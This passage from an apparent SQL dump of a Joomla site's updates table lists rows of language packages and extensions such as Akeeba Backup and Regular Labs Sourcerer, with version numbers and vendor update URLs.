CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22074,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22075,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22076,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22077,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22078,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22079,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22080,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22081,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22082,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22083,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22084,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(22085,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(22086,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22087,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22088,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22089,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22090,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22091,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22092,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22093,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22094,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22095,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22096,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22097,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22098,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22099,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22100,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22101,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22102,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22103,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22104,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22105,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22106,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22107,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22108,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22109,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22110,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22111,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22112,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22113,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22114,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22115,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22116,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22117,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22118,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22119,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22120,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22121,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22122,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22123,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22124,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22125,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22126,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22127,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22128,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22129,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22130,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22131,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22132,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22133,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22134,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22135,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22136,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22137,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22138,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22139,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22140,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22141,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22142,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22143,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22144,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22145,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22146,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22147,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22148,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22149,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22150,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22151,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22152,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22153,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22154,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22155,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22156,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22157,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22158,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22159,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22160,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22161,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22162,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22163,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22164,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22165,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22166,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22167,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22168,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22169,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22170,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22171,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22172,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22173,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22174,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22175,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22176,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22177,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22178,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22179,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22180,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22181,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22182,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22183,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22184,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22185,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22186,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22187,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22188,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(22189,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(22190,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(22191,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.0','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-0.html',''),(22192,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22193,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22194,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22195,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22196,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22197,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22198,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22199,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22200,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22201,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22202,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22203,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22204,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22205,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22206,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22207,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22208,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22209,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22210,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22211,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22212,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22213,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22214,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22215,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22216,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22217,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22218,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22219,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22220,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22221,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22222,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22223,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22224,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22225,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22226,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22227,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22228,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22229,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22230,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22231,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22232,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22233,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22234,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22235,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22236,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22237,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(22238,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(22239,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(22240,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(22241,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(22242,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(22243,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(22244,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(22245,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(22246,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(22247,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(22248,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(22249,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(22250,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(22251,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(22252,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(22253,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(22254,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(22255,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(22256,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(22257,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(22258,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(22259,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(22260,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(22261,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(22262,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(22263,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(22264,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(22265,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(22266,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(22267,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(22268,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(22269,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(22270,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(22271,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(22272,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(22273,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(22274,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(22275,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(22276,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(22277,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(22278,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(22279,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(22280,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(22281,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(22282,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(22283,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(22284,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(22285,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(22286,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(22287,57,0,'German 